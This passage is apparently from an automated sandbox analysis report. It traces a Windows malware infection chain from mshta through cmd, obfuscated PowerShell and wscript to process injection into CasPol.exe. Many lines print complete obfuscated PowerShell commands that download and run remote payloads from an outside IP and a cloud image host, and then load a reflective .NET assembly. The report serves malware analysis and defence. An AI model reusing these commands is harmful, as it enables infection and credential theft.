                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 2EB008Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00410F36
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418754 mouse_event,12_2_00418754
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1B0.tmp" "c:\Users\user\AppData\Local\Temp\1wf2prhw\CSCC38D34038713434CB5EBD437745683DE.TMP"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispiculeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aacvjnbswp"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\lciocgmukyzvv"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\lciocgmukyzvv"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nwvgdqxnygriykln"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $verilus = 'jgfwb3n0b2xpy25lc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskdmlicm9tzxrlcnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrzyw5nyxblbnvtid0gjhzpynjvbwv0zxjzlkrvd25sb2fkrgf0ysgkyxbvc3rvbgljbmvzcyk7jghvcmlzbwfzy29wzsa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrzyw5nyxblbnvtktsksmfuaw5lid0gjzw8qkftrty0x1nuqvjupj4noyr0cmlicm9tc2fsb2wgpsanpdxcqvnfnjrfru5epj4noyrbcmficya9icrob3jpc21hc2nvcguusw5kzxhpzigksmfuaw5lktskcgx1cmlzcglyywwgpsakag9yaxntyxnjb3bllkluzgv4t2yojhryawjyb21zywxvbck7jefyywjzic1nzsawic1hbmqgjhbsdxjpc3bpcmfsic1ndcakqxjhynm7jefyywjzics9icrkyw5pbmuutgvuz3rooyrkzwnlcm5tzw50id0gjhbsdxjpc3bpcmfsic0gjefyywjzoyrhzmlyzsa9icrob3jpc21hc2nvcguuu3vic3ryaw5nkcrbcmficywgjgrly2vybm1lbnqpoyr1bmryzxnzzwqgpsatam9pbiaojgfmaxjlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrhzmlyzs5mzw5ndggpxtskr2fzdg9uid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5kcmvzc2vkktsky3v0axrlcmvicmegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrhyxn0b24poyrhbgxhbnrvawrlysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrhbgxhbnrvawrlys5jbnzva2uojg51bgwsieaojzavdnlpzeivci9lzs5ldhnhcc8vonnwdhrojywgjyriaw9ncmfwagvlcycsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywgj0nhc1bvbccsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnmscsjyriaw9ncmfwagvlcycpkts=';$spinispicule = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($verilus));invoke-expression $spinispicule
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $verilus = 'jgfwb3n0b2xpy25lc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskdmlicm9tzxrlcnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrzyw5nyxblbnvtid0gjhzpynjvbwv0zxjzlkrvd25sb2fkrgf0ysgkyxbvc3rvbgljbmvzcyk7jghvcmlzbwfzy29wzsa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrzyw5nyxblbnvtktsksmfuaw5lid0gjzw8qkftrty0x1nuqvjupj4noyr0cmlicm9tc2fsb2wgpsanpdxcqvnfnjrfru5epj4noyrbcmficya9icrob3jpc21hc2nvcguusw5kzxhpzigksmfuaw5lktskcgx1cmlzcglyywwgpsakag9yaxntyxnjb3bllkluzgv4t2yojhryawjyb21zywxvbck7jefyywjzic1nzsawic1hbmqgjhbsdxjpc3bpcmfsic1ndcakqxjhynm7jefyywjzics9icrkyw5pbmuutgvuz3rooyrkzwnlcm5tzw50id0gjhbsdxjpc3bpcmfsic0gjefyywjzoyrhzmlyzsa9icrob3jpc21hc2nvcguuu3vic3ryaw5nkcrbcmficywgjgrly2vybm1lbnqpoyr1bmryzxnzzwqgpsatam9pbiaojgfmaxjlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrhzmlyzs5mzw5ndggpxtskr2fzdg9uid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5kcmvzc2vkktsky3v0axrlcmvicmegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrhyxn0b24poyrhbgxhbnrvawrlysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrhbgxhbnrvawrlys5jbnzva2uojg51bgwsieaojzavdnlpzeivci9lzs5ldhnhcc8vonnwdhrojywgjyriaw9ncmfwagvlcycsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywgj0nhc1bvbccsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnmscsjyriaw9ncmfwagvlcycpkts=';$spinispicule = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($verilus));invoke-expression $spinispiculeJump to behavior
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager@+N@'
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerE
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG+K@(
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4182814346.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
